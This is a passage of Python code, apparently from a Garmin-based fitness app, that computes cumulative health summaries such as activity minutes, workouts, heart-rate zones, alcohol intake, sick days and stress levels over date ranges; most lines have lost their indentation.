elif key == "active_minutes_without_sleep_exercise_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count
- current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_exercise_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min
- todays_data.cum_exercise_active_min)
act_min_without_sleep_exercise_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min
- current_data.cum_exercise_active_min)
avg_sleep_mins = round(_cal_custom_average(
todays_data.cum_sleep_hours,
current_data.cum_sleep_hours,
mc_days
))
avg_exercise_mins = round(_cal_custom_average(
todays_data.cum_exercise_hours,
current_data.cum_exercise_hours,
mc_days
))
total_mins_without_sleep_exercise = (1440
- avg_sleep_mins
- avg_exercise_mins)
value = round(_cal_custom_average(
act_min_without_sleep_exercise_today,
act_min_without_sleep_exercise_currently,
mc_days))
try:
active_prcnt = round(
(value/total_mins_without_sleep_exercise)*100)
except ZeroDivisionError:
active_prcnt = 0
if mc_days:
return active_prcnt
else:
return "Not Reported"
elif key in grades_bifurcation_keys:
mc_days = todays_meta_data.cum_mc_recorded_days_count\
- current_meta_data.cum_mc_recorded_days_count
return self._cal_grade_days_over_period(todays_data,current_data,
key, mc_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
mc_days = todays_meta_data.cum_mc_recorded_days_count\
- current_meta_data.cum_mc_recorded_days_count
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, mc_days)
return None
calculated_data = {
'movement_consistency_score':{d:None for d in self.duration_type},
'movement_consistency_grade':{d:None for d in self.duration_type},
'movement_consistency_gpa':{d:None for d in self.duration_type},
'total_active_minutes':{d:None for d in self.duration_type},
'sleep_active_minutes':{d:None for d in self.duration_type},
'exercise_active_minutes':{d:None for d in self.duration_type},
'total_active_minutes_prcnt':{d:None for d in self.duration_type},
'active_minutes_without_sleep':{d:None for d in self.duration_type},
'active_minutes_without_sleep_prcnt':{d:None for d in self.duration_type},
'active_minutes_without_sleep_exercise':{d:None for d in self.duration_type},
'active_minutes_without_sleep_exercise_prcnt':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "movement_consistency_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_exercise_consistency_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ec_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ec_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='avg_no_of_days_exercises_per_week':
val = self._get_average_for_duration(
todays_data.cum_avg_exercise_day,
current_data.cum_avg_exercise_day,alias)
return round(val,2)
elif key == 'exercise_consistency_gpa':
val = self._get_average_for_duration(
todays_data.cum_exercise_consistency_gpa,
current_data.cum_exercise_consistency_gpa,alias)
return round(val,2)
elif key == 'exercise_consistency_grade':
return garmin_calculation.cal_exercise_consistency_grade(
self._get_average_for_duration(
todays_data.cum_avg_exercise_day,
current_data.cum_avg_exercise_day,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'avg_no_of_days_exercises_per_week':{d:None for d in self.duration_type},
'exercise_consistency_grade':{d:None for d in self.duration_type},
'exercise_consistency_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "exercise_consistency_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_nutrition_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ufood_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ufood_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='prcnt_unprocessed_volume_of_food':
val = self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed,
current_data.cum_prcnt_unprocessed_food_consumed,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'prcnt_unprocessed_food_gpa':
val = self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed_gpa,
current_data.cum_prcnt_unprocessed_food_consumed_gpa,alias)
return round(val,2)
elif key == 'prcnt_unprocessed_food_grade':
return garmin_calculation.cal_unprocessed_food_grade(
self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed,
current_data.cum_prcnt_unprocessed_food_consumed,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'prcnt_unprocessed_volume_of_food':{d:None for d in self.duration_type},
'prcnt_unprocessed_food_grade':{d:None for d in self.duration_type},
'prcnt_unprocessed_food_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "nutrition_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_exercise_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_workout_dur_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_workout_dur_got')
        def _cal_custom_average(stat1, stat2, days):
            # Average the cumulative difference over the number of reporting days.
            if stat1 is not None and stat2 is not None and days:
                return (stat1 - stat2) / days
            return 0
        # The per-metric averages share the same formula, so the original names
        # are kept as aliases for the call sites below.
        _cal_workout_dur_average = _cal_custom_average
        _cal_effort_lvl_average = _cal_custom_average
        _cal_vo2max_average = _cal_custom_average
        _cal_avg_exercise_hr_average = _cal_custom_average
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='workout_duration_hours_min':
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
avg_hours = _cal_workout_dur_average(
todays_data.cum_workout_duration_in_hours,
current_data.cum_workout_duration_in_hours,
workout_days
)
return self._hours_to_hours_min(avg_hours)
return None
elif key == 'total_workout_duration_over_range':
if todays_meta_data and current_meta_data:
total_duration_over_period = todays_data.cum_workout_duration_in_hours\
- current_data.cum_workout_duration_in_hours
return self._hours_to_hours_min(total_duration_over_period)
return None
elif key == 'workout_effort_level':
if todays_meta_data and current_meta_data:
effort_lvl_days = (todays_meta_data.cum_effort_level_days_count -
current_meta_data.cum_effort_level_days_count)
val = _cal_effort_lvl_average(
todays_data.cum_workout_effort_level,
current_data.cum_workout_effort_level,
effort_lvl_days
)
return round(val,2)
elif key == 'avg_exercise_heart_rate':
if todays_meta_data and current_meta_data:
avg_exercise_hr_days = (todays_meta_data.cum_avg_exercise_hr_days_count -
current_meta_data.cum_avg_exercise_hr_days_count)
val = _cal_avg_exercise_hr_average(
todays_data.cum_avg_exercise_hr,
current_data.cum_avg_exercise_hr,
avg_exercise_hr_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'avg_non_strength_exercise_heart_rate':
if todays_meta_data and current_meta_data:
avg_exercise_hr_days = (todays_meta_data.cum_avg_exercise_hr_days_count -
current_meta_data.cum_avg_exercise_hr_days_count)
val = _cal_avg_exercise_hr_average(
todays_data.cum_avg_non_strength_exercise_hr,
current_data.cum_avg_non_strength_exercise_hr,
avg_exercise_hr_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'total_non_strength_activities':
total_exercise = todays_data.cum_total_exercise_activities\
- current_data.cum_total_exercise_activities
total_strength = todays_data.cum_total_strength_activities\
- current_data.cum_total_strength_activities
return total_exercise - total_strength
elif key == 'total_strength_activities':
val = todays_data.cum_total_strength_activities\
- current_data.cum_total_strength_activities
return val
elif key == 'vo2_max':
if todays_meta_data and current_meta_data:
vo2max_days = (todays_meta_data.cum_vo2_max_days_count -
current_meta_data.cum_vo2_max_days_count)
val = _cal_vo2max_average(
todays_data.cum_vo2_max,
current_data.cum_vo2_max,
vo2max_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_aerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_aerobic_duration_hours\
- current_data.cum_hr_aerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_aerobic_duration':
if todays_meta_data and current_meta_data:
                        # Note: cum_weekly_workout_duration_in_hours now stores
                        # the per-day workout duration from A/A chart 1. It used
                        # to hold a weekly total, hence the misleading name.
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_aerobic_duration = todays_data.cum_hr_aerobic_duration_hours\
- current_data.cum_hr_aerobic_duration_hours
if total_workout_duration:
val = (total_aerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_anaerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_anaerobic_duration_hours\
- current_data.cum_hr_anaerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_anaerobic_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_anaerobic_duration = todays_data.cum_hr_anaerobic_duration_hours\
- current_data.cum_hr_anaerobic_duration_hours
if total_workout_duration:
val = (total_anaerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_below_aerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_below_aerobic_duration_hours\
- current_data.cum_hr_below_aerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_below_aerobic_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_below_aerobic_duration = todays_data.cum_hr_below_aerobic_duration_hours\
- current_data.cum_hr_below_aerobic_duration_hours
if total_workout_duration:
val = (total_below_aerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_not_recorded_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_not_recorded_duration_hours\
- current_data.cum_hr_not_recorded_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_hr_not_recorded_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_hr_not_recorded_duration = todays_data.cum_hr_not_recorded_duration_hours\
- current_data.cum_hr_not_recorded_duration_hours
if total_workout_duration:
val = (total_hr_not_recorded_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key,workout_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, workout_days)
return None
calculated_data = {
'workout_duration_hours_min':{d:None for d in self.duration_type},
'workout_effort_level':{d:None for d in self.duration_type},
'avg_exercise_heart_rate':{d:None for d in self.duration_type},
'avg_non_strength_exercise_heart_rate':{d:None for d in self.duration_type},
'total_non_strength_activities':{d:None for d in self.duration_type},
'total_strength_activities':{d:None for d in self.duration_type},
'vo2_max':{d:None for d in self.duration_type},
'total_workout_duration_over_range':{d:None for d in self.duration_type},
'hr_aerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_aerobic_duration':{d:None for d in self.duration_type},
'hr_anaerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_anaerobic_duration':{d:None for d in self.duration_type},
'hr_below_aerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_below_aerobic_duration':{d:None for d in self.duration_type},
'hr_not_recorded_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_hr_not_recorded_duration':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "exercise_stats_cum"
if custom_daterange:
alias = "custom_range"
summary_type = "exercise_stats_cum"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_alcohol_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_alcohol_week_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_alcohol_week_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='avg_drink_per_day':
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
if alcohol_reported_days:
val = self._get_average_for_duration(
todays_data.cum_alcohol_drink_consumed,
current_data.cum_alcohol_drink_consumed,alias)
return round(val,2)
else:
return 'Not Reported'
elif key =='avg_drink_per_week':
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
if alcohol_reported_days:
val = self._get_average_for_duration(
todays_data.cum_average_drink_per_week,
current_data.cum_average_drink_per_week,alias)
return round(val,2)
else:
return 'Not Reported'
elif key == 'alcoholic_drinks_per_week_gpa':
val = self._get_average_for_duration(
todays_data.cum_alcohol_drink_per_week_gpa,
current_data.cum_alcohol_drink_per_week_gpa,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'alcoholic_drinks_per_week_grade':
return garmin_calculation.cal_alcohol_drink_grade(
self._get_average_for_duration(
todays_data.cum_average_drink_per_week,
current_data.cum_average_drink_per_week,alias
),self.user.profile.gender
)[0]
elif key == "prcnt_alcohol_consumption_reported":
if todays_meta_data and current_meta_data:
val = self._get_average_for_duration(
todays_meta_data.cum_reported_alcohol_days_count,
current_meta_data.cum_reported_alcohol_days_count,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key, alcohol_reported_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias,alcohol_reported_days)
return None
calculated_data = {
'avg_drink_per_day':{d:None for d in self.duration_type},
'avg_drink_per_week':{d:None for d in self.duration_type},
'alcoholic_drinks_per_week_grade':{d:None for d in self.duration_type},
'alcoholic_drinks_per_week_gpa':{d:None for d in self.duration_type},
'prcnt_alcohol_consumption_reported':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "alcohol_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_other_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_resting_hr_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_resting_hr_got')
        def _cal_custom_average(stat1, stat2, days):
            if stat1 is not None and stat2 is not None and days:
                return (stat1 - stat2) / days
            return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='resting_hr':
if todays_meta_data and current_meta_data:
resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
current_meta_data.cum_resting_hr_days_count)
val = _cal_custom_average(
todays_data.cum_resting_hr,
current_data.cum_resting_hr,
resting_hr_days)
if val:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_time_to_99':
if todays_meta_data and current_meta_data:
hrr_time_to_99_days = (todays_meta_data.cum_hrr_to_99_days_count -
current_meta_data.cum_hrr_to_99_days_count)
val = self._min_to_min_sec(_cal_custom_average(
todays_data.cum_hrr_time_to_99_in_mins,
current_data.cum_hrr_time_to_99_in_mins,
hrr_time_to_99_days))
if hrr_time_to_99_days:
return val
else:
return "Not Provided"
return None
elif key == 'hrr_beats_lowered_in_first_min':
if todays_meta_data and current_meta_data:
beats_lowered_in_first_min_days = (
todays_meta_data.cum_hrr_beats_lowered_in_first_min_days_count -
current_meta_data.cum_hrr_beats_lowered_in_first_min_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_beats_lowered_in_first_min,
current_data.cum_hrr_beats_lowered_in_first_min,
beats_lowered_in_first_min_days)
if beats_lowered_in_first_min_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_highest_hr_in_first_min':
if todays_meta_data and current_meta_data:
highest_hr_in_first_min_days = (
todays_meta_data.cum_highest_hr_in_first_min_days_count -
current_meta_data.cum_highest_hr_in_first_min_days_count
)
val = _cal_custom_average(
todays_data.cum_highest_hr_in_first_min,
current_data.cum_highest_hr_in_first_min,
highest_hr_in_first_min_days)
if highest_hr_in_first_min_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_lowest_hr_point':
if todays_meta_data and current_meta_data:
hrr_lowest_hr_point_days = (
todays_meta_data.cum_hrr_lowest_hr_point_days_count -
current_meta_data.cum_hrr_lowest_hr_point_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_lowest_hr_point,
current_data.cum_hrr_lowest_hr_point,
hrr_lowest_hr_point_days)
if hrr_lowest_hr_point_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_pure_1_minute_beat_lowered':
if todays_meta_data and current_meta_data:
hrr_pure_1_minute_beat_lowered_days = (
todays_meta_data.cum_hrr_pure_1_minute_beat_lowered_days_count
- current_meta_data.cum_hrr_pure_1_minute_beat_lowered_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_pure_1_min_beats_lowered,
current_data.cum_hrr_pure_1_min_beats_lowered,
hrr_pure_1_minute_beat_lowered_days)
if hrr_pure_1_minute_beat_lowered_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_pure_time_to_99':
if todays_meta_data and current_meta_data:
hrr_pure_time_to_99_days = (
todays_meta_data.cum_hrr_pure_time_to_99_days_count
- current_meta_data.cum_hrr_pure_time_to_99_days_count
)
val = self._min_to_min_sec(_cal_custom_average(
todays_data.cum_hrr_pure_time_to_99,
current_data.cum_hrr_pure_time_to_99,
hrr_pure_time_to_99_days))
if hrr_pure_time_to_99_days:
return val
else:
return "Not Provided"
return None
elif key == 'hrr_activity_end_hr':
if todays_meta_data and current_meta_data:
hrr_activity_end_hr = (
todays_meta_data.cum_hrr_activity_end_hr_days_count
- current_meta_data.cum_hrr_activity_end_hr_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_activity_end_hr,
current_data.cum_hrr_activity_end_hr,
hrr_activity_end_hr)
if hrr_activity_end_hr:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'floors_climbed':
val = self._get_average_for_duration(
todays_data.cum_floors_climbed,
current_data.cum_floors_climbed,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'number_of_days_reported_inputs':
if todays_meta_data and current_meta_data:
days_reported_inputs = (
todays_meta_data.cum_inputs_reported_days_count
- current_meta_data.cum_inputs_reported_days_count
)
if days_reported_inputs:
return days_reported_inputs
else:
return "Not Reported"
elif key == 'prcnt_of_days_reported_inputs':
if todays_meta_data and current_meta_data:
val = self._get_average_for_duration(
todays_meta_data.cum_inputs_reported_days_count,
current_meta_data.cum_inputs_reported_days_count,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
current_meta_data.cum_resting_hr_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key, resting_hr_days)
                elif key in grades_prcnt_bifurcation_keys:
                    if todays_meta_data and current_meta_data:
                        resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
                            current_meta_data.cum_resting_hr_days_count)
                        return self._cal_prcnt_grade_over_period(todays_data,current_data,
                            key, alias, resting_hr_days)
return None
calculated_data = {
'resting_hr':{d:None for d in self.duration_type},
'hrr_time_to_99':{d:None for d in self.duration_type},
'hrr_beats_lowered_in_first_min':{d:None for d in self.duration_type},
'hrr_highest_hr_in_first_min':{d:None for d in self.duration_type},
'hrr_lowest_hr_point':{d:None for d in self.duration_type},
'hrr_pure_1_minute_beat_lowered':{d:None for d in self.duration_type},
'hrr_pure_time_to_99':{d:None for d in self.duration_type},
'hrr_activity_end_hr':{d:None for d in self.duration_type},
'floors_climbed':{d:None for d in self.duration_type},
'number_of_days_reported_inputs': {d:None for d in self.duration_type},
'prcnt_of_days_reported_inputs': {d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "other_stats_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_sick_summary(self,custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_of_days_not_sick':
if todays_meta_data and current_meta_data:
days_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
val = days_sick_reported - days_sick
return val
elif key == 'prcnt_of_days_not_sick':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
days_not_sick = days_sick_not_sick_reported - days_sick
if days_sick_not_sick_reported:
val = (days_not_sick/days_sick_not_sick_reported) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'number_of_days_sick':
val = todays_data.cum_days_sick - current_data.cum_days_sick
return val
elif key == 'prcnt_of_days_sick':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
if days_sick_not_sick_reported:
val = (days_sick/days_sick_not_sick_reported) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'days_sick_not_sick_reported':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
return days_sick_not_sick_reported
return None
calculated_data = {
'number_of_days_not_sick':{d:None for d in self.duration_type},
'prcnt_of_days_not_sick':{d:None for d in self.duration_type},
'number_of_days_sick':{d:None for d in self.duration_type},
'prcnt_of_days_sick':{d:None for d in self.duration_type},
'days_sick_not_sick_reported':{d:None for d in self.duration_type}
}
summary_type = "sick_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_stress_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_garmin_stress_days_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('garmin_stress_days_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_of_days_low_stress_reported':
days_low_stress = (
todays_data.cum_days_low_stress -
current_data.cum_days_low_stress
)
return days_low_stress
elif key == "prcnt_of_days_low_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_low_stress = (
todays_data.cum_days_low_stress -
current_data.cum_days_low_stress
)
if days_stress_reported:
val = (days_low_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "number_of_days_medium_stress_reported":
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
return days_medium_stress
elif key == "prcnt_of_days_medium_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
if days_stress_reported:
val = (days_medium_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "number_of_days_high_stress_reported":
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
return days_high_stress
elif key == "prcnt_of_days_high_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
if days_stress_reported:
val = (days_high_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "days_stress_level_reported":
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
return days_stress_reported
elif key == "garmin_stress_lvl":
avg_stress_level = self._get_average_for_duration(
todays_data.cum_days_garmin_stress_lvl,
current_data.cum_days_garmin_stress_lvl,alias)
return round(avg_stress_level,2)
elif key == "number_of_days_high_medium_stress":
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
return days_medium_stress+days_high_stress
elif key == "prcnt_of_days_high_medium_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
total_medium_high_stress_days = days_medium_stress + days_high_stress
if days_stress_reported:
val = (total_medium_high_stress_days/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
reported_days = todays_meta_data.cum_have_garmin_stress_days_count\
- current_meta_data.cum_have_garmin_stress_days_count
return self._cal_grade_days_over_period(todays_data, current_data,
key, reported_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
reported_days = todays_meta_data.cum_have_garmin_stress_days_count\
- current_meta_data.cum_have_garmin_stress_days_count
return self._cal_prcnt_grade_over_period(todays_data, current_data,
key, alias, reported_days)
return None
calculated_data = {
'number_of_days_low_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_low_stress':{d:None for d in self.duration_type},
'number_of_days_medium_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_medium_stress':{d:None for d in self.duration_type},
'number_of_days_high_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_high_stress':{d:None for d in self.duration_type},
'days_stress_level_reported':{d:None for d in self.duration_type},
'garmin_stress_lvl':{d:None for d in self.duration_type},
'number_of_days_high_medium_stress':{d:None for d in self.duration_type},
'prcnt_of_days_high_medium_stress':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "stress_cum"
